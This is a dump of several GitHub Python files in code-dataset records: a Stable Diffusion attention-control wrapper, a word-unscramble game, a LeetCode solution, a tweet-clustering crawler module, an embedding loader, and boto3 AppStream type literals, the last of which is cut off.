self.width = 512\n\n self.diff_step = 0\n self.register_attention_control()\n\n\n def diffusion_step(self, latents, context, t, other_context=None):\n if self.model_config[\"low_resource\"]:\n self.uncond_pred = True\n noise_pred_uncond = self.model.unet(latents, t, encoder_hidden_states=(context[0], None))[\"sample\"]\n self.uncond_pred = False\n noise_prediction_text = self.model.unet(latents, t, encoder_hidden_states=(context[1], other_context))[\"sample\"]\n else:\n latents_input = torch.cat([latents] * 2)\n noise_pred = self.model.unet(latents_input, t, encoder_hidden_states=(context, other_context))[\"sample\"]\n noise_pred_uncond, noise_prediction_text = noise_pred.chunk(2)\n noise_pred = noise_pred_uncond + self.model_config[\"guidance_scale\"] * (noise_prediction_text - noise_pred_uncond)\n latents = self.model.scheduler.step(noise_pred, t, latents)[\"prev_sample\"]\n latents = self.controller.step_callback(latents)\n return latents\n\n\n def latent2image(self, latents):\n latents = 1 / 0.18215 * latents\n image = self.model.vae.decode(latents)['sample']\n image = (image / 2 + 0.5).clamp(0, 1)\n image = image.cpu().permute(0, 2, 3, 1).numpy()\n image = (image * 255).astype(np.uint8)\n return image\n\n\n def init_latent(self, latent, batch_size):\n if latent is None:\n latent = torch.randn(\n (1, self.model.unet.in_channels, self.height // 8, self.width // 8),\n generator=self.generator, device=self.model.device\n )\n latents = latent.expand(batch_size, self.model.unet.in_channels, self.height // 8, self.width // 8).to(self.device)\n return latent, latents\n\n\n def register_attention_control(self):\n def ca_forward(model_self, place_in_unet):\n to_out = model_self.to_out\n if type(to_out) is torch.nn.modules.container.ModuleList:\n to_out = model_self.to_out[0]\n else:\n to_out = model_self.to_out\n\n def forward(x, context=None, mask=None):\n batch_size, sequence_length, dim = 
x.shape\n h = model_self.heads\n q = model_self.to_q(x)\n is_cross = context is not None\n context = context if is_cross else (x, None)\n\n k = model_self.to_k(context[0])\n if is_cross and self.prompt_mixing is not None:\n v_context = self.prompt_mixing.get_context_for_v(self.diff_step, context[0], context[1])\n v = model_self.to_v(v_context)\n else:\n v = model_self.to_v(context[0])\n\n q = model_self.reshape_heads_to_batch_dim(q)\n k = model_self.reshape_heads_to_batch_dim(k)\n v = model_self.reshape_heads_to_batch_dim(v)\n\n sim = torch.einsum(\"b i d, b j d -> b i j\", q, k) * model_self.scale\n\n if mask is not None:\n mask = mask.reshape(batch_size, -1)\n max_neg_value = -torch.finfo(sim.dtype).max\n mask = mask[:, None, :].repeat(h, 1, 1)\n sim.masked_fill_(~mask, max_neg_value)\n\n # attention, what we cannot get enough of\n attn = sim.softmax(dim=-1)\n if self.enbale_attn_controller_changes:\n attn = self.controller(attn, is_cross, place_in_unet)\n \n if is_cross and self.prompt_mixing is not None and context[1] is not None:\n attn = self.prompt_mixing.get_cross_attn(self, self.diff_step, attn, place_in_unet, batch_size)\n\n if not is_cross and (not self.model_config[\"low_resource\"] or not self.uncond_pred) and self.prompt_mixing is not None:\n attn = self.prompt_mixing.get_self_attn(self, self.diff_step, attn, place_in_unet, batch_size)\n\n out = torch.einsum(\"b i j, b j d -> b i d\", attn, v)\n out = model_self.reshape_batch_dim_to_heads(out)\n return to_out(out)\n\n return forward\n\n def register_recr(net_, count, place_in_unet):\n if net_.__class__.__name__ == 'CrossAttention':\n net_.forward = ca_forward(net_, place_in_unet)\n return count + 1\n elif hasattr(net_, 'children'):\n for net__ in net_.children():\n count = register_recr(net__, count, place_in_unet)\n return count\n\n cross_att_count = 0\n sub_nets = self.model.unet.named_children()\n for net in sub_nets:\n if \"down\" in net[0]:\n cross_att_count += register_recr(net[1], 0, \"down\")\n elif \"up\" in net[0]:\n cross_att_count += register_recr(net[1], 0, \"up\")\n elif \"mid\" in net[0]:\n cross_att_count += register_recr(net[1], 0, \"mid\")\n self.controller.num_att_layers = cross_att_count\n\n\n def get_text_embedding(self, prompt: List[str], max_length=None, truncation=True):\n text_input = self.model.tokenizer(\n prompt,\n padding=\"max_length\",\n max_length=self.model.tokenizer.model_max_length if max_length is None else max_length,\n truncation=truncation,\n return_tensors=\"pt\",\n )\n text_embeddings = self.model.text_encoder(text_input.input_ids.to(self.device))[0]\n max_length = text_input.input_ids.shape[-1]\n return text_embeddings, max_length\n\n\n @torch.no_grad()\n def forward(self, prompt: List[str], latent: Optional[torch.FloatTensor] = None,\n other_prompt: List[str] = None, post_background = False, orig_all_latents = None, orig_mask = None,\n uncond_embeddings=None, start_time=51, return_type='image'):\n self.enbale_attn_controller_changes = True\n batch_size = len(prompt)\n\n text_embeddings, max_length = self.get_text_embedding(prompt)\n if uncond_embeddings is None:\n uncond_embeddings_, _ = self.get_text_embedding([\"\"] * batch_size, max_length=max_length, truncation=False)\n else:\n uncond_embeddings_ = None\n\n other_context = None\n if other_prompt is not None:\n other_text_embeddings, _ = self.get_text_embedding(other_prompt)\n other_context = other_text_embeddings\n\n latent, latents = self.init_latent(latent, batch_size)\n \n # set timesteps\n 
self.model.scheduler.set_timesteps(self.model_config[\"num_diffusion_steps\"])\n all_latents = []\n\n object_mask = None\n self.diff_step = 0\n for i, t in enumerate(tqdm(self.model.scheduler.timesteps[-start_time:])):\n if uncond_embeddings_ is None:\n context = [uncond_embeddings[i].expand(*text_embeddings.shape), text_embeddings]\n else:\n context = [uncond_embeddings_, text_embeddings]\n if not self.model_config[\"low_resource\"]:\n context = torch.cat(context)\n\n self.down_cross_index = 0\n self.mid_cross_index = 0\n self.up_cross_index = 0\n latents = self.diffusion_step(latents, context, t, other_context)\n\n if post_background and self.diff_step == self.args.background_blend_timestep:\n object_mask = Segmentor(self.controller,\n prompt,\n self.args.num_segments,\n self.args.background_segment_threshold,\n background_nouns=self.args.background_nouns)\\\n .get_background_mask(self.args.prompt.split(' ').index(\"{word}\") + 1)\n self.enbale_attn_controller_changes = False\n mask = object_mask.astype(np.bool8) + orig_mask.astype(np.bool8)\n mask = torch.from_numpy(mask).float().cuda()\n shape = (1, 1, mask.shape[0], mask.shape[1])\n mask = torch.nn.Upsample(size=(64, 64), mode='nearest')(mask.view(shape))\n mask_eroded = dilate(mask.cpu().numpy()[0, 0], np.ones((3, 3), np.uint8), iterations=1)\n mask = torch.from_numpy(mask_eroded).float().cuda().view(1, 1, 64, 64)\n latents = mask * latents + (1 - mask) * orig_all_latents[self.diff_step]\n\n all_latents.append(latents)\n self.diff_step += 1\n\n if return_type == 'image':\n image = self.latent2image(latents)\n else:\n image = latents\n \n return image, latent, all_latents, object_mask\n \n \n def show_last_cross_attention(self, res: int, from_where: List[str], prompts, select: int = 0):\n show_cross_attention(self.controller, res, from_where, prompts, tokenizer=self.model.tokenizer, select=select)","repo_name":"orpatashnik/local-prompt-mixing","sub_path":"src/diffusion_model_wrapper.py","file_name":"diffusion_model_wrapper.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"81"} +{"seq_id":"37734692637","text":"import random\nfrom typing import Tuple\nimport unscramble_functions as uf\n\nTEST = 'T'\nNORMAL = 'N'\nHINT = 'H'\nSECTION_HINT = 1\nMOVE_HINT = 2\n\n\ndef start_game() -> Tuple[str, str, str, str]:\n \"\"\"Return the start state, answer, mode, and section length of a new game.\n \"\"\"\n mode = get_mode()\n if in_test_mode(mode):\n answer, section_len = start_test_mode()\n elif in_hint_mode(mode):\n # Hint mode only works with a section length of 3\n games = ['CATDOGEMUFOX', 'WHOAREYOU', 'PIEEGGHAMOATBUNFIGJAM', 'ZIGZAG']\n answer = random.choice(games)\n section_len = uf.HINT_MODE_SECTION_LENGTH\n else:\n games = {'CATDOGEMUFOX': 3, 'ITISOK': 2, 'PYTHONORANGEWAFFLE': 6,\n 'CAKERICEKIWISOUPPIES': 4 , 'ROCKLAKE': 4}\n answer = random.choice(list(games.keys()))\n section_len = games[answer]\n state = generate_starting_point(answer, section_len)\n return state, answer, mode, section_len\n\n\ndef start_test_mode() -> Tuple[str, int]:\n \"\"\"Return the answer and section_len that the user wants to test with.\n \"\"\"\n answer = input('Enter the answer to use: ')\n prompt = 'Enter the section length to use: '\n section_len = input(prompt)\n while not (section_len.isdigit() and len(answer) % int(section_len) == 0):\n print('Invalid section length!')\n section_len = input(prompt)\n return answer, int(section_len)\n\n\ndef 
generate_starting_point(answer: str, section_len: int) -> str:\n \"\"\"Return a scrambled version of answer with section length section_len.\n\n >>> random.seed(42)\n >>> generate_starting_point('CATDOGFOXEMU', 3)\n 'ACTGODOXFMUE'\n \"\"\"\n starter = ''\n for i in range(len(answer) // section_len):\n section = list(answer[section_len * i:section_len * (i + 1)])\n random.shuffle(section)\n starter = starter + ''.join(section)\n return starter\n\n\ndef get_section_hint(state: str, answer: str) -> int:\n \"\"\"Return a random section number corresponding to a section of state that\n is not arranged the same as in answer.\n\n Precondition: Section length for state and answer is 3.\n\n >>> random.seed(42)\n >>> get_section_hint('CATDGOMUEXOF', 'CATDOGEMUFOX')\n 3\n >>> get_section_hint('CTADGOMUEXOF', 'CATDOGEMUFOX')\n 4\n \"\"\"\n section_nums = [i + 1\n for i in range(len(state) // uf.HINT_MODE_SECTION_LENGTH)]\n random.shuffle(section_nums)\n for section_num in section_nums:\n if not uf.check_section(state, answer, section_num,\n uf.HINT_MODE_SECTION_LENGTH):\n return section_num\n return 0 # should never get here\n\n\ndef is_valid_mode(mode: str) -> bool:\n \"\"\"Return True if and only if mode is a valid mode.\n\n >>> is_valid_mode('T')\n True\n >>> is_valid_mode('S')\n False\n \"\"\"\n return mode == TEST or mode == NORMAL or mode == HINT\n\n\ndef in_test_mode(mode: str) -> bool:\n \"\"\"Return True if and only if mode indicates the game is in test mode.\n\n >>> in_test_mode('T')\n True\n >>> in_test_mode('N')\n False\n \"\"\"\n return mode == TEST\n\n\ndef in_hint_mode(mode: str) -> bool:\n \"\"\"Return True if and only if mode indicates the game is in hint mode.\n\n >>> in_hint_mode('H')\n True\n >>> in_hint_mode('N')\n False\n \"\"\"\n return mode == HINT\n\n\ndef make_move(state: str, answer: str, section_num: int, move: str,\n section_len: int) -> str:\n \"\"\"Return the new game state after performing the game move specified by\n move on the section of state correspoding to section_num. 
If the move is\n checking, the specified section in the game state is compared to the \n same section in answer.\n The section length is given by section_len\n\n\n >>> make_move('TCADOGEMUFOX', 'CATDOGEMUFOX', 1, 'S', 3)\n 'CATDOGEMUFOX'\n >>> make_move('CATDOGUMEFOX', 'CATDOGEMUFOX', 3, 'C', 3)\n The section is incorrect\n 'CATDOGUMEFOX'\n \"\"\"\n if move == uf.CHECK:\n check_result = uf.check_section(state, answer, section_num, section_len)\n if check_result:\n print('The section is correct')\n else:\n print('The section is incorrect')\n else:\n state = uf.change_section(state, move, section_num, section_len)\n return state\n\n\ndef get_mode() -> str:\n \"\"\"Return a valid game mode entered by the user.\n \"\"\"\n prompt = 'Enter the mode to play [(T)est, (N)ormal, or (H)int]: '\n mode = input(prompt).upper()\n while not is_valid_mode(mode):\n print('Invalid mode!')\n mode = input(prompt).upper()\n return mode\n\n\ndef get_section_number(answer: str, section_len: int) -> int:\n \"\"\"Return a valid section number for answer as entered by the user\n based on the section_len.\n \"\"\"\n prompt = 'Enter a section number (1 - ' + \\\n str(uf.get_num_sections(answer, section_len)) + '): '\n section_num = input(prompt)\n while not (section_num.isdigit() and\n uf.is_valid_section(int(section_num), answer, section_len)):\n print('Invalid section number!')\n section_num = input(prompt)\n return int(section_num)\n\n\ndef get_move() -> str:\n \"\"\"Return a valid move entered by the user.\n \"\"\"\n msg = 'Enter a move for that section (C to check, S to shift, F to flip): '\n move = input(msg).upper()\n while not uf.is_valid_move(move):\n print('Invalid move!')\n move = input(msg).upper()\n return move\n\n\ndef get_hints(state: str, answer: str, mode: str, hint_type: str,\n section_num: int) -> int:\n \"\"\"Return 1 if a hint was given, and 0 if not. 
Prompt the user to answer\n whether they would like a hint of type hint_type if and only if mode\n indicates the game is in hint mode.\n\n If yes, generate the hint on how to rearrange state based on the current\n state and the asnwer (only using section_num if hint_type corresponds to \n a move hint) and print the hint.\n\n Preconditon: section_num is a valid section and the section length of state\n and answer is 3 if hint_type is MOVE_HINT.\n \"\"\"\n if in_hint_mode(mode):\n if hint_type == SECTION_HINT:\n hint = input('Enter Y if you want a section hint: ').upper()\n if hint == 'Y':\n print('Your section hint is: ' +\n str(get_section_hint(state, answer)))\n return 1\n elif hint_type == MOVE_HINT:\n hint = input('Enter Y if you want a move hint: ').upper()\n if hint == 'Y':\n print('Your move hint is: ' +\n uf.get_move_hint(state, answer, section_num))\n return 1\n return 0\n\n\ndef play_game(state: str, answer: str, mode: str, section_len: int) -> int:\n \"\"\"Return the number of moves taken to move from state and arrive at \n the correct answer given the mode and section_len.\n\n Run the main loop in game-mode mode, prompting the user for input and\n consequently updating state.\n \"\"\"\n moves = 0\n if in_test_mode(mode):\n print('Answer: ' + answer)\n\n while state != answer:\n print('Current state: ' + state)\n moves += get_hints(state, answer, mode, SECTION_HINT, -1)\n section_num = get_section_number(answer, section_len)\n moves += get_hints(state, answer, mode, MOVE_HINT, section_num)\n move = get_move()\n state = make_move(state, answer, section_num, move, section_len)\n moves += 1\n return moves\n\n\nif __name__ == '__main__':\n\n start_state, game_answer, game_mode, section_length = start_game()\n num_moves = play_game(start_state, game_answer, game_mode, section_length)\n print('You got the answer {0} in {1} moves!'.format(game_answer, num_moves))\n","repo_name":"mayushanmayurathan/unscrambled-game","sub_path":"unscramble_game.py","file_name":"unscramble_game.py","file_ext":"py","file_size_in_byte":7705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74008854026","text":"#\n# @lc app=leetcode id=283 lang=python3\n#\n# [283] Move Zeroes\n#\nfrom typing import List\n\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n index = 0\n for i, n in enumerate(nums):\n if n != 0:\n nums[i], nums[index], index = nums[index], nums[i], index + 1\n\n\nif __name__ == '__main__':\n nums = [0, 1, 0, 3, 12]\n # nums = [0, 0, 0, 1]\n Solution().moveZeroes(nums)\n print(nums)\n","repo_name":"Alfonsxh/LeetCode-Challenge-python","sub_path":"LeetCode/Python/283.move-zeroes.py","file_name":"283.move-zeroes.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31999303454","text":"\nfrom utils import *\nfrom config import *\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom tqdm import tqdm\nfrom collections import Counter\n\n\n\nclass Tweet:\n def __init__(self, tweet_data):\n if 'text' in tweet_data.keys():\n self.text = preprocess_text(tweet_data['text'])\n self.tweet_type = self.get_type(tweet_data)\n\n if 'user' in tweet_data.keys():\n self.user = TwitterUser(tweet_data['user'])\n else:\n self.user = None\n self.get_geo_data(tweet_data)\n \n def 
set_vector(self, vec):\n self.vector = vec\n def get_type(self, data):\n if 'extended_tweet' in data.keys():\n self.is_extended = True\n self.extended_tweet = data['extended_tweet']\n if 'entities' in self.extended_tweet.keys():\n self.entities = self.extended_tweet['entities']\n else: self.is_extended = False\n if 'user' in data.keys(): \n if data['user']['screen_name'] == \"Retweeter\":\n return 'retweet'\n if data['user']['screen_name'] == \"TweetQuoter\":\n self.text = f\"{self.text} {preprocess_text(data['quoted_status'])}\"\n return 'quote'\n return 'normal'\n def get_geo_data(self, data):\n self.geo_locations = {}\n\n if \"geo\" in data.keys():\n self.geo_locations['geo'] = data[\"geo\"]\n elif \"coordinates\" in data.keys():\n self.geo_locations['coordinates'] = data[\"coordinates\"]\n elif \"place\" in data.keys():\n self.geo_locations['place'] = data[\"place\"]\n \n def __str__(self):\n return f\"Tweet object: type: {self.tweet_type}\"\n\n\n\n\nclass TwitterUser:\n def __init__(self, user_data):\n self.id = user_data['id']\n self.name = user_data['name']\n self.screen_name = user_data['screen_name']\n self.location = user_data['location']\n self.description = user_data['description']\n self.verified = user_data['verified']\n self.statuses_count = user_data['statuses_count']\n self.created_at = user_data['created_at']\n self.followers = user_data['followers_count']\n self.is_default = json.dumps(user_data).find('default_profile_image') != -1\n\n\n\nclass TweetData:\n def __init__(self, tweets, save_random_image=False):\n self.tweets = tweets\n self.cluster_counter = 0\n self.clusters = []\n self.metrics_counts = {\n 'retweets': 0,\n 'quotes': 0,\n 'media': 0,\n 'verified': 0,\n 'geo_tagged': 0,\n 'loc_or_place': 0\n }\n self.process_tweets()\n self.group_tweets()\n self.report()\n\n def process_tweets(self):\n print('Processing tweets started....')\n corpus = list(map(get_tweet_text, self.tweets))\n self.vectorizer = TfidfVectorizer(strip_accents='ascii', lowercase=True, stop_words='english')\n vector = self.vectorizer.fit_transform(corpus)\n images_downlaoded = 0\n for tweet in tqdm(self.tweets):\n tweet.set_vector(\n self.vectorizer.transform([tweet.text])\n )\n if tweet.tweet_type != 'normal':\n if tweet.tweet_type == 'retweet': self.metrics_counts['retweets'] += 1\n if tweet.tweet_type == 'quote': self.metrics_counts['quotes'] += 1\n if tweet.is_extended:\n if 'media' in tweet.entities:\n for image in tweet.entities['media']:\n if images_downlaoded == 0:\n print(image['media_url'])\n download_image(image['media_url'])\n images_downlaoded = 1\n self.metrics_counts['media'] += 1\n if len(tweet.geo_locations.keys()) > 0:\n if 'geo' in tweet.geo_locations.keys(): self.metrics_counts['geo_tagged'] += 1\n if any([(x in tweet.geo_locations.keys()) for x in ['coordinates', 'place']]): self.metrics_counts['loc_or_place'] += 1\n if tweet.user != None:\n if tweet.user.verified: self.metrics_counts['verified'] += 1\n \n def group_tweets(self):\n print('Grouping tweets started....')\n for tweet in tqdm(self.tweets):\n max_sim = 0\n if self.cluster_counter == 0:\n self.clusters.append(Cluster(0, tweet))\n self.cluster_counter += 1\n else:\n cluster_id = 0\n # try all clusters\n for cluster in self.clusters:\n cos_sim = cosine_similarity(cluster.vector, tweet.vector)\n \n if cos_sim > max_sim:\n max_sim = cos_sim\n cluster_id = cluster.id\n \n if self.cluster_counter < 10 and max_sim < 0.0005:\n self.clusters.append(Cluster(self.cluster_counter, tweet))\n self.cluster_counter += 1\n else:\n 
self.clusters[cluster_id].add_tweet(tweet)\n # print(f\"currently num of clusters: {self.cluster_counter}\")\n \n def report(self):\n print('Grouping finished!')\n print(f\"Num of clusters: {self.cluster_counter}\")\n print(f\"Num of tweets: {len(self.tweets)}\")\n tweet_lens = []\n for cluster in self.clusters:\n out = cluster.get_most_used_word()\n print(f\"most used word in cluster {cluster.id} is {out}\")\n tweet_lens.append(len(cluster.tweets))\n print(f\"num of tweets {len(cluster.tweets)}\")\n print(\"Groups formed: 10\")\n print(f\"Min size: {min(tweet_lens)}\")\n print(f\"Max size: {max(tweet_lens)}\")\n print(f\"Avg size: {sum(tweet_lens) / 10}\")\n\n print('Metrics')\n for key in self.metrics_counts:\n print(f\"{key}: {self.metrics_counts[key]}\")\n \n\n\nclass Cluster:\n def __init__(self, id, tweet):\n self.id = id\n self.vector = tweet.vector\n self.tweets = [tweet]\n self.users = [tweet.user]\n def update_vector(self, new_vec):\n self.vector = (self.vector + new_vec) / 2\n def add_tweet(self, tweet):\n self.tweets.append(tweet)\n self.update_vector(tweet.vector)\n def get_most_used_word(self):\n given_string = \"\"\n for tweet in self.tweets:\n given_string += tweet.text\n words = given_string.split()\n return Counter(words).most_common(3)\n \n","repo_name":"s-froghyar/ws-twitter-crawler","sub_path":"tweet_classes.py","file_name":"tweet_classes.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8291346057","text":"import gensim.downloader as api\nimport numpy as np\nimport torch.nn as nn\nimport torch\n\n\nclass EmbeddingLoader():\n def __init__(self, embedding_dim, pretrained_embedding_name=None):\n self.embedding_dim = embedding_dim\n\n if pretrained_embedding_name is not None:\n self.vectors = api.load(pretrained_embedding_name)\n self.embedding_dim = self.vectors.vector_size\n else:\n self.vectors = None\n\n\n def load_embedding(self, index2token):\n self.emb_weights = np.random.normal(scale=0.6, size=(len(index2token), self.embedding_dim))\n\n if self.vectors is not None:\n for index, token in index2token.items():\n embedding = np.zeros(self.embedding_dim)\n for label in token:\n if label in self.vectors:\n embedding += self.vectors[label]\n else:\n embedding += np.random.normal(scale=0.2, size=self.embedding_dim)\n\n # Get average of the embeddings of the token \"phrase\"\n embedding /= len(token)\n\n self.emb_weights[index] = embedding\n\n\n def get_embedding_layer(self, freeze=False):\n emb_layer = nn.Embedding.from_pretrained(torch.tensor(self.emb_weights, dtype=torch.float))\n\n if freeze:\n emb_layer.weight.requires_grad = False\n else:\n emb_layer.weight.requires_grad = True\n\n return emb_layer","repo_name":"sander102907/autoencoder_program_synthesis","sub_path":"autoencoder_program_synthesis/model_utils/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"10327364099","text":"\"\"\"\nType annotations for appstream service literal definitions.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_appstream/literals.html)\n\nUsage::\n\n ```python\n from mypy_boto3_appstream.literals import AccessEndpointTypeType\n\n data: AccessEndpointTypeType = \"STREAMING\"\n ```\n\"\"\"\nimport sys\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import 
Literal\n\n__all__ = (\n \"AccessEndpointTypeType\",\n \"ActionType\",\n \"AppVisibilityType\",\n \"ApplicationAttributeType\",\n \"AuthenticationTypeType\",\n \"CertificateBasedAuthStatusType\",\n \"DescribeDirectoryConfigsPaginatorName\",\n \"DescribeFleetsPaginatorName\",\n \"DescribeImageBuildersPaginatorName\",\n \"DescribeImagesPaginatorName\",\n \"DescribeSessionsPaginatorName\",\n \"DescribeStacksPaginatorName\",\n \"DescribeUserStackAssociationsPaginatorName\",\n \"DescribeUsersPaginatorName\",\n \"FleetAttributeType\",\n \"FleetErrorCodeType\",\n \"FleetStartedWaiterName\",\n \"FleetStateType\",\n \"FleetStoppedWaiterName\",\n \"FleetTypeType\",\n \"ImageBuilderStateChangeReasonCodeType\",\n \"ImageBuilderStateType\",\n \"ImageStateChangeReasonCodeType\",\n \"ImageStateType\",\n \"ListAssociatedFleetsPaginatorName\",\n \"ListAssociatedStacksPaginatorName\",\n \"MessageActionType\",\n \"PermissionType\",\n \"PlatformTypeType\",\n \"PreferredProtocolType\",\n \"SessionConnectionStateType\",\n \"SessionStateType\",\n \"StackAttributeType\",\n \"StackErrorCodeType\",\n \"StorageConnectorTypeType\",\n \"StreamViewType\",\n \"UsageReportExecutionErrorCodeType\",\n \"UsageReportScheduleType\",\n \"UserStackAssociationErrorCodeType\",\n \"VisibilityTypeType\",\n)\n\nAccessEndpointTypeType = Literal[\"STREAMING\"]\nActionType = Literal[\n \"CLIPBOARD_COPY_FROM_LOCAL_DEVICE\",\n \"CLIPBOARD_COPY_TO_LOCAL_DEVICE\",\n \"DOMAIN_PASSWORD_SIGNIN\",\n \"DOMAIN_SMART_CARD_SIGNIN\",\n \"FILE_DOWNLOAD\",\n \"FILE_UPLOAD\",\n \"PRINTING_TO_LOCAL_DEVICE\",\n]\nAppVisibilityType = Literal[\"ALL\", \"ASSOCIATED\"]\nApplicationAttributeType = Literal[\"LAUNCH_PARAMETERS\", \"WORKING_DIRECTORY\"]\nAuthenticationTypeType = Literal[\"API\", \"AWS_AD\", \"SAML\", \"USERPOOL\"]\nCertificateBasedAuthStatusType = Literal[\n \"DISABLED\", \"ENABLED\", \"ENABLED_NO_DIRECTORY_LOGIN_FALLBACK\"\n]\nDescribeDirectoryConfigsPaginatorName = Literal[\"describe_directory_configs\"]\nDescribeFleetsPaginatorName = Literal[\"describe_fleets\"]\nDescribeImageBuildersPaginatorName = Literal[\"describe_image_builders\"]\nDescribeImagesPaginatorName = Literal[\"describe_images\"]\nDescribeSessionsPaginatorName = Literal[\"describe_sessions\"]\nDescribeStacksPaginatorName = Literal[\"describe_stacks\"]\nDescribeUserStackAssociationsPaginatorName = Literal[\"describe_user_stack_associations\"]\nDescribeUsersPaginatorName = Literal[\"describe_users\"]\nFleetAttributeType = Literal[\n \"DOMAIN_JOIN_INFO\",\n \"IAM_ROLE_ARN\",\n \"SESSION_SCRIPT_S3_LOCATION\",\n \"USB_DEVICE_FILTER_STRINGS\",\n \"VPC_CONFIGURATION\",\n \"VPC_CONFIGURATION_SECURITY_GROUP_IDS\",\n]\nFleetErrorCodeType = Literal[\n \"DOMAIN_JOIN_ERROR_ACCESS_DENIED\",\n \"DOMAIN_JOIN_ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED\",\n \"DOMAIN_JOIN_ERROR_FILE_NOT_FOUND\",\n \"DOMAIN_JOIN_ERROR_INVALID_PARAMETER\",\n \"DOMAIN_JOIN_ERROR_LOGON_FAILURE\",\n \"DOMAIN_JOIN_ERROR_MORE_DATA\",\n \"DOMAIN_JOIN_ERROR_NOT_SUPPORTED\",\n \"DOMAIN_JOIN_ERROR_NO_SUCH_DOMAIN\",\n \"DOMAIN_JOIN_INTERNAL_SERVICE_ERROR\",\n \"DOMAIN_JOIN_NERR_INVALID_WORKGROUP_NAME\",\n \"DOMAIN_JOIN_NERR_PASSWORD_EXPIRED\",\n \"DOMAIN_JOIN_NERR_WORKSTATION_NOT_STARTED\",\n \"FLEET_INSTANCE_PROVISIONING_FAILURE\",\n \"FLEET_STOPPED\",\n \"IAM_SERVICE_ROLE_IS_MISSING\",\n \"IAM_SERVICE_ROLE_MISSING_DESCRIBE_SECURITY_GROUPS_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_DESCRIBE_SUBNET_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_ENI_CREATE_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_ENI_DELETE_ACTION\",\n 
\"IAM_SERVICE_ROLE_MISSING_ENI_DESCRIBE_ACTION\",\n \"IGW_NOT_ATTACHED\",\n \"IMAGE_NOT_FOUND\",\n \"INTERNAL_SERVICE_ERROR\",\n \"INVALID_SUBNET_CONFIGURATION\",\n \"MACHINE_ROLE_IS_MISSING\",\n \"NETWORK_INTERFACE_LIMIT_EXCEEDED\",\n \"SECURITY_GROUPS_NOT_FOUND\",\n \"STS_DISABLED_IN_REGION\",\n \"SUBNET_HAS_INSUFFICIENT_IP_ADDRESSES\",\n \"SUBNET_NOT_FOUND\",\n]\nFleetStartedWaiterName = Literal[\"fleet_started\"]\nFleetStateType = Literal[\"RUNNING\", \"STARTING\", \"STOPPED\", \"STOPPING\"]\nFleetStoppedWaiterName = Literal[\"fleet_stopped\"]\nFleetTypeType = Literal[\"ALWAYS_ON\", \"ELASTIC\", \"ON_DEMAND\"]\nImageBuilderStateChangeReasonCodeType = Literal[\"IMAGE_UNAVAILABLE\", \"INTERNAL_ERROR\"]\nImageBuilderStateType = Literal[\n \"DELETING\",\n \"FAILED\",\n \"PENDING\",\n \"PENDING_QUALIFICATION\",\n \"REBOOTING\",\n \"RUNNING\",\n \"SNAPSHOTTING\",\n \"STOPPED\",\n \"STOPPING\",\n \"UPDATING\",\n \"UPDATING_AGENT\",\n]\nImageStateChangeReasonCodeType = Literal[\n \"IMAGE_BUILDER_NOT_AVAILABLE\", \"IMAGE_COPY_FAILURE\", \"INTERNAL_ERROR\"\n]\nImageStateType = Literal[\n \"AVAILABLE\", \"COPYING\", \"CREATING\", \"DELETING\", \"FAILED\", \"IMPORTING\", \"PENDING\"\n]\nListAssociatedFleetsPaginatorName = Literal[\"list_associated_fleets\"]\nListAssociatedStacksPaginatorName = Literal[\"list_associated_stacks\"]\nMessageActionType = Literal[\"RESEND\", \"SUPPRESS\"]\nPermissionType = Literal[\"DISABLED\", \"ENABLED\"]\nPlatformTypeType = Literal[\"AMAZON_LINUX2\", \"WINDOWS\", \"WINDOWS_SERVER_2016\", \"WINDOWS_SERVER_2019\"]\nPreferredProtocolType = Literal[\"TCP\", \"UDP\"]\nSessionConnectionStateType = Literal[\"CONNECTED\", \"NOT_CONNECTED\"]\nSessionStateType = Literal[\"ACTIVE\", \"EXPIRED\", \"PENDING\"]\nStackAttributeType = Literal[\n \"ACCESS_ENDPOINTS\",\n \"EMBED_HOST_DOMAINS\",\n \"FEEDBACK_URL\",\n \"IAM_ROLE_ARN\",\n \"REDIRECT_URL\",\n \"STORAGE_CONNECTORS\",\n \"STORAGE_CONNECTOR_GOOGLE_DRIVE\",\n \"STORAGE_CONNECTOR_HOMEFOLDERS\",\n \"STORAGE_CONNECTOR_ONE_DRIVE\",\n \"STREAMING_EXPERIENCE_SETTINGS\",\n \"THEME_NAME\",\n \"USER_SETTINGS\",\n]\nStackErrorCodeType = Literal[\"INTERNAL_SERVICE_ERROR\", \"STORAGE_CONNECTOR_ERROR\"]\nStorageConnectorTypeType = Literal[\"GOOGLE_DRIVE\", \"HOMEFOLDERS\", \"ONE_DRIVE\"]\nStreamViewType = Literal[\"APP\", \"DESKTOP\"]\nUsageReportExecutionErrorCodeType = Literal[\n \"ACCESS_DENIED\", \"INTERNAL_SERVICE_ERROR\", \"RESOURCE_NOT_FOUND\"\n]\nUsageReportScheduleType = Literal[\"DAILY\"]\nUserStackAssociationErrorCodeType = Literal[\n \"DIRECTORY_NOT_FOUND\", \"INTERNAL_ERROR\", \"STACK_NOT_FOUND\", \"USER_NAME_NOT_FOUND\"\n]\nVisibilityTypeType = Literal[\"PRIVATE\", \"PUBLIC\", 